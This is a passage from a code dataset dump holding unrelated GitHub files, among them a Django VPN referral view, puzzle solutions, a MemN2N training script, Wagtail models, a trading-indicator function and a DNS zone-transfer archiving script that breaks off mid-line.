timedelta(days=30)\n\n top_ref = User.objects.annotate(n_ref=Count('referrals')).order_by('-n_ref')[:10]\n top_ref_week = User.objects.filter(referrals__user__date_joined__gt=last_week) \\\n .annotate(n_ref=Count('referrals')) \\\n .order_by('-n_ref')[:10]\n top_ref_month = User.objects.filter(referrals__user__date_joined__gt=last_month) \\\n .annotate(n_ref=Count('referrals')) \\\n .order_by('-n_ref')[:10]\n\n ctx = {\n 'top_ref': top_ref,\n 'top_ref_week': top_ref_week,\n 'top_ref_month': top_ref_month,\n }\n ctx.update(site.each_context(request))\n return render(request, 'lambdainst/admin_ref.html', ctx)\n\n\n\n\n\n","repo_name":"CCrypto/ccvpn3","sub_path":"lambdainst/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"} +{"seq_id":"40978420741","text":"from collections import defaultdict,deque\nimport functools\nimport heapq\nfrom queue import Queue,LifoQueue,PriorityQueue\nfrom bisect import bisect_right,insort_left,bisect_left\nfrom functools import cache\n\nclass Solution(object):\n def countDaysTogether(self, arriveAlice, leaveAlice, arriveBob, leaveBob):\n \"\"\"\n :type arriveAlice: str\n :type leaveAlice: str\n :type arriveBob: str\n :type leaveBob: str\n :rtype: int\n \"\"\"\n lss = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n def getDay(str1):\n ls= str1.split(\"-\")\n a,b = int(ls[0]),int(ls[1])\n #print(a,b,sum(lss[:a]) +b ,sum(lss[:a]) )\n return sum(lss[:a-1]) +b \n alice =[getDay(arriveAlice) , getDay(leaveAlice)]\n bob =[getDay(arriveBob) , getDay(leaveBob)]\n cnt = 0\n #print(alice,bob)\n for i in range(366):\n if alice[0]<=i<=alice[1] and bob[0]<=i<=bob[1]:\n cnt +=1\n return cnt\n\n\n\n\n\nre =Solution().countDaysTogether(arriveAlice = \"10-01\", leaveAlice = \"10-31\", arriveBob = \"11-01\", leaveBob = \"12-31\")\nprint(re)","repo_name":"wherby/code","sub_path":"contest/00000c275d69/d87/q1/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21925581195","text":"\n'''\n\nProgram to Find Smallest Item in a Tuple\n\n'''\n\n\n\n# Tuple Max Item\n\ndef tupleSmallest(smTuple):\n tupSmallest = smTuple[0]\n for i in smTuple:\n if(tupSmallest > i):\n tupSmallest = i\n return tupSmallest\n\nsmTuple = (19, 77, 13, 87, 33, 6, 17, 45, 66) \nprint(\"Tuple Items = \", smTuple)\n\nsmt = tupleSmallest(smTuple)\nprint(\"Smallest Item in smTuple Tuple = \", smt)","repo_name":"naveentrigunayat/Pythontutorial","sub_path":"Python Code/45.A.Tuple Algorithms/24.Program to Find Smallest Item in a Tuple.py","file_name":"24.Program to Find Smallest Item in a Tuple.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34628487498","text":"\nfrom reportlab.platypus.flowables import Image\nfrom properties import *\n# from pixies.utils import *\n\nclass ExternalGraphic( Image, Properties ):\n\t\"\"\" \n\tMap to the fo:external-graphic XSL-FO element.\n\tProperties to be supported are:\n\t\t- \"scaling\" -- § 7.14.10 on page 250\n\t\t- \"scaling-method\" -- § 7.14.11 on page 251\n\t\t- \"src\" -- § 7.28.7 on page 335\n\t\t- \"text-align\" -- § 7.15.9 on page 258\n\t\t- \"width\" -- § 7.14.12 on page 251\n\t\"\"\"\n\n\tdef __init__( self, attrs ):\n\t\t\n\t\t# PIL is required to draw images\n\t\ttry:\n\t\t\timport PIL\n\t\texcept ImportError:\n\t\t\tError(\"\"\"\nPIL (Python Imaging Library) is required to use images in \nyour documents. \nYou should download and install it. \nhttp://www.pythonware.com/products/pil/\n\t\t\t\t\"\"\")\n\t\t\n\t\tProperties.__init__(self)\n\t\tself.graphic( attrs )\n\t\t\n\t\tif self.properties['src']:\n\t\t\tself.filename = self.properties['src']\n\t\telse:\n\t\t\tError('No source defined for external-graphic element.')\n\t\t\n\t\tImage.__init__( self, self.filename )\n","repo_name":"BackupTheBerlios/pixies-svn","sub_path":"pixies/elements/graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37481084634","text":"\"\"\"Example running MemN2N on a single bAbI task.\nDownload tasks from facebook.ai/babi \"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom data_utils import load_task, vectorize_data\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom memn2n_kv import MemN2N_KV\nfrom itertools import chain\nfrom six.moves import range\n\nimport tensorflow as tf\nimport numpy as np\nfrom memn2n_kv import zero_nil_slot, add_gradient_noise\n\ntf.flags.DEFINE_float(\"epsilon\", 0.1, \"Epsilon value for Adam Optimizer.\")\ntf.flags.DEFINE_float(\"l2_lambda\", 0.2, \"Lambda for l2 loss.\")\ntf.flags.DEFINE_float(\"learning_rate\", 0.001, \"Learning rate\")\ntf.flags.DEFINE_float(\"max_grad_norm\", 20.0, \"Clip gradients to this norm.\")\ntf.flags.DEFINE_float(\"keep_prob\", 1.0, \"Keep probability for dropout\")\ntf.flags.DEFINE_integer(\"evaluation_interval\", 50, \"Evaluate and print results every x epochs\")\ntf.flags.DEFINE_integer(\"batch_size\", 32, \"Batch size for training.\")\ntf.flags.DEFINE_integer(\"feature_size\", 40, \"Feature size\")\ntf.flags.DEFINE_integer(\"hops\", 3, \"Number of hops in the Memory Network.\")\ntf.flags.DEFINE_integer(\"epochs\", 100, \"Number of epochs to train for.\")\ntf.flags.DEFINE_integer(\"embedding_size\", 30, \"Embedding size for embedding matrices.\")\ntf.flags.DEFINE_integer(\"memory_size\", 20, \"Maximum size of memory.\")\ntf.flags.DEFINE_integer(\"task_id\", 1, \"bAbI task id, 1 <= id <= 20\")\ntf.flags.DEFINE_string(\"data_dir\", \"data/tasks_1-20_v1-2/en/\", \"Directory containing bAbI tasks\")\ntf.flags.DEFINE_string(\"reader\", \"bow\", \"Reader for the model (bow, simple_gru)\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\ntf.flags.DEFINE_string(\"output_file\", \"single_scores.csv\", \"Name of output file for final bAbI accuracy scores.\")\n\nFLAGS = tf.flags.FLAGS\n\nprint(\"Started Task:\", FLAGS.task_id)\n\n# task data\ntrain, test = load_task(FLAGS.data_dir, FLAGS.task_id)\ndata = train + test\n\nvocab = sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + a) for s, q, a in data)))\nword_idx = dict((c, i + 1) for i, c in enumerate(vocab))\n\nmax_story_size = max(map(len, (s for s, _, _ in data)))\nmean_story_size = int(np.mean(map(len, (s for s, _, _ in data))))\nsentence_size = max(map(len, chain.from_iterable(s for s, _, _ in data)))\nquery_size = max(map(len, (q for _, q, _ in data)))\nmemory_size = min(FLAGS.memory_size, max_story_size)\nvocab_size = len(word_idx) + 1 # +1 for nil word\nsentence_size = max(query_size, sentence_size) # for the position\n\nprint(\"Longest sentence length\", sentence_size)\nprint(\"Longest story length\", max_story_size)\nprint(\"Average story length\", mean_story_size)\n\n# train/validation/test sets\nS, Q, A = vectorize_data(train, word_idx, sentence_size, memory_size)\ntrainS, valS, trainQ, valQ, trainA, valA = train_test_split(S, Q, A, test_size=.1)\ntestS, testQ, testA = vectorize_data(test, word_idx, sentence_size, memory_size)\n\nprint(\"Training set shape\", trainS.shape)\n\n# params\nn_train = trainS.shape[0]\nn_test = testS.shape[0]\nn_val = valS.shape[0]\n\nprint(\"Training Size\", n_train)\nprint(\"Validation Size\", n_val)\nprint(\"Testing Size\", n_test)\n\ntrain_labels = np.argmax(trainA, axis=1)\ntest_labels = np.argmax(testA, axis=1)\nval_labels = np.argmax(valA, axis=1)\n\nbatch_size = FLAGS.batch_size\nbatches = zip(range(0, n_train-batch_size, batch_size), range(batch_size, n_train, batch_size))\n\nwith tf.Graph().as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n # decay learning rate\n starter_learning_rate = FLAGS.learning_rate\n learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, 20000, 0.96, staircase=True)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, epsilon=FLAGS.epsilon)\n\n with tf.Session() as sess:\n \n model = MemN2N_KV(batch_size=batch_size, vocab_size=vocab_size,\n query_size=sentence_size, story_size=sentence_size, memory_key_size=memory_size,\n feature_size=FLAGS.feature_size, memory_value_size=memory_size,\n embedding_size=FLAGS.embedding_size, hops=FLAGS.hops, reader=FLAGS.reader,\n l2_lambda=FLAGS.l2_lambda)\n grads_and_vars = optimizer.compute_gradients(model.loss_op)\n\n grads_and_vars = [(tf.clip_by_norm(g, FLAGS.max_grad_norm), v)\n for g, v in grads_and_vars if g is not None]\n grads_and_vars = [(add_gradient_noise(g), v) for g, v in grads_and_vars]\n nil_grads_and_vars = []\n for g, v in grads_and_vars:\n if v.name in model._nil_vars:\n nil_grads_and_vars.append((zero_nil_slot(g), v))\n else:\n nil_grads_and_vars.append((g, v))\n\n train_op = optimizer.apply_gradients(nil_grads_and_vars, name=\"train_op\", global_step=global_step)\n sess.run(tf.global_variables_initializer())\n\n def train_step(s, q, a):\n feed_dict = {\n model._memory_value: s,\n model._query: q,\n model._memory_key: s,\n model._labels: a,\n model.keep_prob: FLAGS.keep_prob\n }\n _, step, predict_op = sess.run([train_op, global_step, model.predict_op], feed_dict)\n return predict_op\n\n def test_step(s, q):\n feed_dict = {\n model._query: q,\n model._memory_key: s,\n model._memory_value: s,\n model.keep_prob: 1\n }\n preds = sess.run(model.predict_op, feed_dict)\n return preds\n\n for t in range(1, FLAGS.epochs+1):\n np.random.shuffle(batches)\n train_preds = []\n #for start in range(0, n_train, batch_size):\n for start, end in batches:\n #end = start + batch_size\n s = trainS[start:end]\n q = trainQ[start:end]\n a = trainA[start:end]\n predict_op = train_step(s, q, a)\n train_preds += list(predict_op)\n \n if t % FLAGS.evaluation_interval == 0:\n # test on train dataset\n train_preds = test_step(trainS, trainQ)\n train_acc = metrics.accuracy_score(train_labels, train_preds)\n print('-----------------------')\n print('Epoch', t)\n print('Training Accuracy: {0:.2f}'.format(train_acc))\n print('-----------------------')\n\n val_preds = test_step(valS, valQ)\n val_acc = metrics.accuracy_score(np.array(val_preds), val_labels)\n print (val_preds)\n print('-----------------------')\n print('Epoch', t)\n print('Validation Accuracy:', val_acc)\n print('-----------------------')\n # test on train dataset\n train_preds = test_step(trainS, trainQ)\n train_acc = metrics.accuracy_score(train_labels, train_preds)\n train_acc = '{0:.2f}'.format(train_acc)\n # eval dataset\n val_preds = test_step(valS, valQ)\n val_acc = metrics.accuracy_score(val_labels, val_preds)\n val_acc = '{0:.2f}'.format(val_acc)\n # testing dataset\n test_preds = test_step(testS, testQ)\n test_acc = metrics.accuracy_score(test_labels, test_preds)\n test_acc = '{0:.2f}'.format(test_acc)\n print(\"Testing Accuracy: {}\".format(test_acc))\n print('Writing final results to {}'.format(FLAGS.output_file))\n with open(FLAGS.output_file, 'a') as f:\n f.write('{}, {}, {}, {}\\n'.format(FLAGS.task_id, test_acc, train_acc, val_acc))\n","repo_name":"siyuanzhao/key-value-memory-networks","sub_path":"single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"7"} +{"seq_id":"32634896306","text":"from django.db import models\n\nfrom modelcluster.fields import ParentalKey\n\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n MultiFieldPanel,\n InlinePanel,\n PageChooserPanel,\n)\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom news.models import NewsIndexPage\n\nclass HomePageCarousel(Orderable):\n page = ParentalKey(\"home.HomePage\", related_name=\"carousel_images\")\n carousel_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n carousel_header = models.CharField(max_length=150, blank=True, null=True)\n carousel_text = models.CharField(max_length=300, blank=True, null=True)\n \n panels = [\n MultiFieldPanel([\n ImageChooserPanel(\"carousel_image\"),\n FieldPanel(\"carousel_header\"),\n FieldPanel(\"carousel_text\"), \n ], heading='Carousel')\n]\n \n\nclass HomePage(Page):\n subpage_types = [\n 'news.NewsIndexPage',\n 'about.AboutPage',\n 'services.ServicesPage',\n 'gallery.GalleryPage',\n 'testimonials.TestimonialsPage',\n 'contact.ContactPage'\n ]\n max_count = 1 \n\n video_url = models.URLField(blank=False, null=True)\n logo = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n header = models.CharField(max_length=150, blank=True, null=True)\n subheader = models.CharField(max_length=150, blank=True, null=True)\n content = models.CharField(max_length=550, blank=True, null=True)\n content_panels = Page.content_panels + [\n MultiFieldPanel(\n [InlinePanel(\"carousel_images\", max_num=5,\n min_num=1, label=\"Image\"), ],\n heading=\"Carousel Images\",\n ),\n MultiFieldPanel([\n FieldPanel(\"header\"),\n FieldPanel(\"subheader\"), \n ImageChooserPanel(\"logo\"),\n FieldPanel(\"content\"),\n FieldPanel(\"video_url\"), \n ], heading='Hero Config') \n ]\n\n def get_carousel_images(self):\n carousel_list = []\n for image in self.carousel_images.all():\n if image.carousel_image != None:\n carousel_list.append(image)\n return carousel_list\n\n def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n try:\n newspage = self.get_children().exact_type(NewsIndexPage)\n recent_news = newspage.first().get_children().live().order_by('-first_published_at')\n if newspage.live():\n context['recent_news'] = recent_news[:3]\n else:\n context['recent_news'] = None\n return context\n except:\n return context\n","repo_name":"codersofcolour-sites/london-jaguar-fc","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34768687547","text":"from graph import *\nfrom graph_helper import *\nfrom constants import *\nfrom input_output import *\nfrom solver_algorithms import *\n\n\"\"\"\nThis file extracts leafy spanning trees from graphs, for part 2 of the MLST project.\n\"\"\"\n\n# Takes in files from default input, solves them using all algorithms, logs their\n# performance onto the console, writes the solutions into a file, and merges the\n# solutions from this run with the solutions from the existing file to generate\n# the best solution thus far\ndef do_everything():\n\tgraphs = input_graphs_from_file(ALL_GRAPHS_INPUT)\n\ttrees = find_leafy_spanning_trees(graphs)\n\toutput_graphs_to_new_file(trees, TEMPORARY_TREES_OUTPUT)\n\tmerge_solutions(ALL_TREES_OUTPUT, TEMPORARY_TREES_OUTPUT, ALL_TREES_OUTPUT)\n\n\n# Takes a list of graphs and returns the leafiest spanning tree we can find\n# by running them through all of our algorithms\ndef find_leafy_spanning_trees(graphs):\n\n\t# Initialize our graph-tree pairs\n\tour_graphs = input_graphs_from_file(OUR_GRAPHS)\n\tour_trees = input_graphs_from_file(OUR_TREES)\n\n\t# Initialize manually-solved graph-tree pairs\n\tmanually_solved_graphs = input_graphs_from_file(MANUALLY_SOLVED_GRAPHS)\n\tmanually_solved_trees = input_graphs_from_file(MANUALLY_SOLVED_TREES)\n\n\tleafy_spanning_trees = []\n\n\tfor i in range(len(graphs)):\n\t\tbest_tree = find_leafy_spanning_tree(graphs[i], i, our_graphs, our_trees, manually_solved_graphs, manually_solved_trees)\n\t\tleafy_spanning_trees.append(best_tree)\n\n\treturn leafy_spanning_trees\n\n\n# Takes a graph and returns the leafiest spanning tree we can find by running\n# it through all of our algorithms\n# For best results, also provide our own graph-tree pairs and manually-solved pairs\ndef find_leafy_spanning_tree(graph, graph_number=0, our_graphs=[], our_trees=[], manually_solved_graphs=[], manually_solved_trees=[]):\n\n\t# Maintain a record of bests so far\n\tbest_tree = None\n\tbest_leaf_count = 0\n\tbest_algorithm = ''\n\n\t# Test for graph generated by us\n\tfor i in range(len(our_graphs)):\n\t\tif are_equivalent_graphs(graph, our_graphs[i]):\n\t\t\tour_trees[i].search()\n\t\t\tbest_tree = our_trees[i]\n\t\t\tbest_leaf_count = our_trees[i].num_leaves\n\t\t\tbest_algorithm = 'our own solution'\n\n\t# Test for line\n\tif is_line(graph):\n\t\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(len(get_leaves(graph))) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: detected line')\n\t\treturn graph\n\n\t# Test for tree\n\tif is_tree(graph):\n\t\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(len(get_leaves(graph))) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: detected tree')\n\t\treturn graph\n\n\t# Test for small input size\n\tif len(get_edges(graph)) < SMALL_NUMBER_OF_EDGES:\n\t\tfor i in range(len(manually_solved_graphs)):\n\t\t\tif are_equivalent_graphs(graph, manually_solved_graphs[i]):\n\t\t\t\tsolved_tree = manually_solved_trees[i]\n\t\t\t\tsolved_tree.search()\n\t\t\t\tif solved_tree.num_leaves > best_leaf_count:\n\t\t\t\t\tbest_tree = solved_tree\n\t\t\t\t\tbest_leaf_count = solved_tree.num_leaves\n\t\t\t\t\tbest_algorithm = 'manually solved'\n\n\t# Try all algorithms and record the best one\n\tfor algorithm_name, algorithm in ALGORITHMS:\n\t\ttree = algorithm(graph)\n\t\ttree.search()\n\n\t\tif tree.num_leaves > best_leaf_count:\n\t\t\tbest_tree = tree\n\t\t\tbest_leaf_count = tree.num_leaves\n\t\t\tbest_algorithm = algorithm_name\n\n\t# Log the best solution\n\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(best_leaf_count) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: ' + best_algorithm)\n\n\treturn best_tree\n\n\n\n\n","repo_name":"jimmyjwu/maximum_leaf_spanning_tree","sub_path":"python/graph_solver.py","file_name":"graph_solver.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"26799167123","text":"import argparse\r\nimport bisect\r\nimport collections\r\nimport functools\r\nimport itertools\r\nimport math\r\nimport operator\r\nfrom collections import Counter, defaultdict, deque\r\nfrom heapq import heappop, heappush\r\nfrom itertools import combinations, permutations, product\r\n\r\nimport parse\r\nfrom rich import print\r\n\r\ndebug = set(\"0\")\r\ndebug_space = False\r\n\r\n\r\ndef dbg(*args, lvl=\"0\", **kwargs):\r\n if lvl in debug:\r\n print(lvl)\r\n print(*args, **kwargs)\r\n if debug_space:\r\n print()\r\n\r\n\r\ndef set_debuger():\r\n global debug, debug_space\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"-d\", \"--debug\", nargs=\"?\", const=\"0\", default=\"0\", help=\"Debug List\"\r\n )\r\n parser.add_argument(\r\n \"-n\", \"--nodebug\", action=\"store_true\", help=\"Remove default debug\"\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--addspace\", action=\"store_true\", help=\"Space between debug\"\r\n )\r\n args = parser.parse_args()\r\n debug.update({x for x in args.debug})\r\n if args.nodebug:\r\n debug.remove(\"0\")\r\n if args.addspace:\r\n debug_space = True\r\n\r\n\r\n# ===== ^^ DEBUGER ^^ =====\r\n\r\nwsen = {\"E\": (1, 0), \"S\": (0, -1), \"W\": (-1, 0), \"N\": (0, 1)}\r\nlrud = {\"R\": (1, 0), \"D\": (0, -1), \"L\": (-1, 0), \"U\": (0, 1)}\r\ndir_4 = [(-1, 0), (0, -1), (1, 0), (0, 1)]\r\ndir_8 = [(-1, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1)]\r\n\r\n\r\ndef prod(factors):\r\n return functools.reduce(operator.mul, factors, 1)\r\n\r\n\r\ndef read_data(file_name):\r\n with open(file_name + \".txt\", \"r\", newline=None) as data:\r\n data = data.read().splitlines()\r\n return data\r\n\r\n\r\ndef load_int_lines(datat):\r\n data = datat[:]\r\n for idx, i in enumerate(data):\r\n data[idx] = [x for x in i]\r\n return data\r\n\r\n\r\ndef load_int_commas(datat):\r\n return list(map(int, datat[0].split(\",\")))\r\n\r\n\r\ndef parser(data):\r\n pattern = \"{test} foo {test1:d}\"\r\n match = parse.search(pattern, data)\r\n match.named\r\n\r\n\r\n# ===== ^^ PART OF TEMPLATE ^^ =====\r\ndef sum_list(x, y):\r\n for i in range(len(x)):\r\n x[i] += y[i]\r\n\r\n\r\ndef part_test():\r\n data = read_data(\"test\")\r\n assert part_1(data) == 13\r\n assert part_2(data) == 1\r\n data = read_data(\"test_2\")\r\n assert part_2(data) == 36\r\n\r\n\r\ndef part_1(data):\r\n t = [0,0]\r\n h = [0,0]\r\n visited = set()\r\n\r\n def jump(x, y):\r\n ...\r\n # if abs(x[0]-y[0]) + abs(x[1]-y[1]) >= 3:\r\n\r\n if tuple(x) == tuple(y):\r\n return \r\n if any((x[0]+xx, x[1]+yy) == tuple(y) for xx, yy in dir_8):\r\n return\r\n\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_4:\r\n if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n\r\n\r\n for dir_num in data:\r\n dir, num = dir_num.split(\" \")\r\n for _ in range(int(num)):\r\n sum_list(h, lrud[dir])\r\n jump(t, h)\r\n\r\n visited.add(tuple(t))\r\n\r\n return len(visited)\r\n\r\n\r\n \r\n\r\n\r\ndef part_2(data):\r\n\r\n # grid = [[0 for _ in range(7)] for _ in range(7)]\r\n t = [[0,0] for _ in range(10)]\r\n visited = set()\r\n\r\n def jump(x, y):\r\n ...\r\n if abs(x[0]-y[0]) + abs(x[1]-y[1]) > 4:\r\n raise\r\n\r\n\r\n if tuple(x) == tuple(y):\r\n return \r\n if any((x[0]+xx, x[1]+yy) == tuple(y) for xx, yy in dir_8):\r\n return\r\n\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_4:\r\n if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_8:\r\n if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n\r\n\r\n for dir_num in data:\r\n dir, num = dir_num.split(\" \")\r\n for _ in range(int(num)):\r\n sum_list(t[0], lrud[dir])\r\n for r in range(9):\r\n jump(t[r+1], t[r])\r\n\r\n visited.add(tuple(t[9]))\r\n\r\n return len(visited)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n set_debuger()\r\n\r\n part_test()\r\n data = read_data(\"input\")\r\n print(part_1(data[:]))\r\n print(part_2(data[:]))\r\n","repo_name":"Cvaniak/AdventOfCode","sub_path":"2022/Day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"29410100100","text":"#\n# @lc app=leetcode id=23 lang=python3\n#\n# [23] Merge k Sorted Lists\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n # 1 . iterate 2 list at a time and merge into one and append it to a new list. \n # 2 . then assign lists = mergedlsit \n # 3. continue this process till 1 list left\n\n if not lists or len(lists) == 0:\n return None\n # continuing the process\n while len(lists) > 1:\n mergedList = []\n # iterate over 2 list at a time\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i+1] if (i+1) < len(lists) else None\n # after merging two list into one appending to mergelist\n mergedList.append(self.mergeList(l1, l2))\n # assiging lists = mergedList\n lists = mergedList\n return lists[0]\n\n def mergeList(self, l1, l2):\n dummy = ListNode()\n tail = dummy\n\n while l1 and l2: \n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else: \n tail.next = l2\n l2 = l2.next\n tail = tail.next\n \n if l1: \n tail.next = l1\n if l2: \n tail.next = l2\n\n return dummy.next\n\n\n \n# @lc code=end\n\n","repo_name":"asifulhaque087/leetcode","sub_path":"23.merge-k-sorted-lists.py","file_name":"23.merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16768189551","text":"import numpy as np\n\ndef ema (self, array, period ):\n\n ema = np.zeros_like(array) \n ema[0] = np.mean(array[0] , dtype=np.float32)\n alpha = 2 / (period + 1)\n\n for i in range(1 , len(array) ):\n ema[i] = np.array( (array[i] * alpha + ema[i-1] * (1-alpha) ) , dtype=np.float32 )\n \n return ema \n\ndef gmma(close, **kwargs):\n\n gmma = np.empty((len(close), len(kwargs.keys()) ))\n for i, (key, value) in enumerate(kwargs.items()):\n gmma[: , i] = ema( close , value )\n\n return gmma \n \n \n\"\"\" Example\ngmma(close , ema1=3 ,ema2=5 ,ema3=8 ,ema4=10 ,ema5=12 ,ema6=15 ,ema7=30 ,ema8=35 ,ema9=40 ,ema10=45 ,ema11=50 ,ema12=60 )\n\n\"\"\"\n","repo_name":"Aliyansayz/gmma_indicator","sub_path":"gmma.py","file_name":"gmma.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"430528253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 7 22:03:49 2019\r\n\r\n@author: Sophie\r\n\"\"\"\r\nimport numpy\r\n\r\n\r\ndef powerLevel(gridSerial, dim):\r\n arr = numpy.zeros((dim + 1, dim +1))\r\n Max = -45\r\n maxCord = [0, 0, 0]\r\n for xCor in range(1, dim + 1):\r\n for yCor in range(1, dim +1):\r\n rackId = xCor + 10\r\n PowerLevel = (rackId * yCor + gridSerial)* rackId\r\n PowerLevel = PowerLevel - (PowerLevel % 100)\r\n arr[xCor,yCor] = ((PowerLevel/ 100) % 10) - 5\r\n for k in range(1, 30):\r\n for i in range(1, dim - k +1):\r\n for j in range(1, dim -2):\r\n val = arr[i:i+k,j:j+k].sum()\r\n if val > Max:\r\n Max = val\r\n maxCord = [Max, i, j, k]\r\n \r\n return maxCord\r\n\r\nprint(\"Real Deal: \", powerLevel(9995, 300))\r\n#print(\"Desired answer is 119 and 12dim actual answer is: \", powerLevel(42, 300))\r\n","repo_name":"BeyondMeta/AdventOfCode2018","sub_path":"AdventCode2018/advent2018d11.py","file_name":"advent2018d11.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14777113330","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport logging\nimport os\nimport sys\nimport subprocess\n\nsys.path.append(os.path.join(os.path.dirname(__file__),'..','etc'))\nsys.path.append(os.path.join(os.path.dirname(__file__),'..','lib'))\n\nimport zoneconfig\n\n\nclass Zonetransfer(object):\n\tdef __init__(self):\n\t\tself.archives = os.path.join(os.path.dirname(__file__),'..','archives')\n\t\t# initialize logger\n\t\tLOGFILE = os.path.join(os.path.dirname(__file__),'..','var','zonetransfer.log')\n\t\tlogging.basicConfig(format='%(asctime)s %(message)s', filename=LOGFILE, level=logging.INFO)\n\t\t# get timestamp\n\t\tself.now = datetime.now()\n\t\n\tdef get_dig_axfr_output(self, hostname, nameserver):\n\t\tlogging.info(\"Start zonetransfer for %s on %s\" %(hostname, nameserver))\n\t\tproc = subprocess.Popen([\"/usr/bin/dig\", \"AXFR\", hostname, \"@\" + nameserver, \"+nocomments\", \"+nocmd\", \"+noquestion\", \"+nostats\", \"+time=15\"], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\t\treturn output\n\t\t\n\tdef zone_transfer_succeeded(self, zone_data):\n\t\tif \"Transfer failed.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: connection refused.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"communications error\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: network unreachable.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: host unreachable.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"connection timed out; no servers could be reached\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif zone_data == \"\":\n\t\t\tlogging.error(\"Unknown error\")\n\t\t\treturn False\n\t\tlogging.info(\"Zonetransfer succeeded\")\n\t\treturn True\n\t\t\n\tdef write_dig_output(self, hostname, nameserver, dig_output):\n\t\tif hostname == \".\":\n\t\t\thostname = \"root\"\n\t\tif hostname.endswith( \".\" ):\n\t\t\tdir_path = os.path.join(self.archives, hostname[:-1])\n\t\telse:\n\t\t\tdir_path = os.path.join(self.archives, hostname)\n\t\tif not os.path.exists( dir_path ):\n\t\t\tos.makedirs( dir_path )\n\t\tfilename = os.path.join(dir_path, 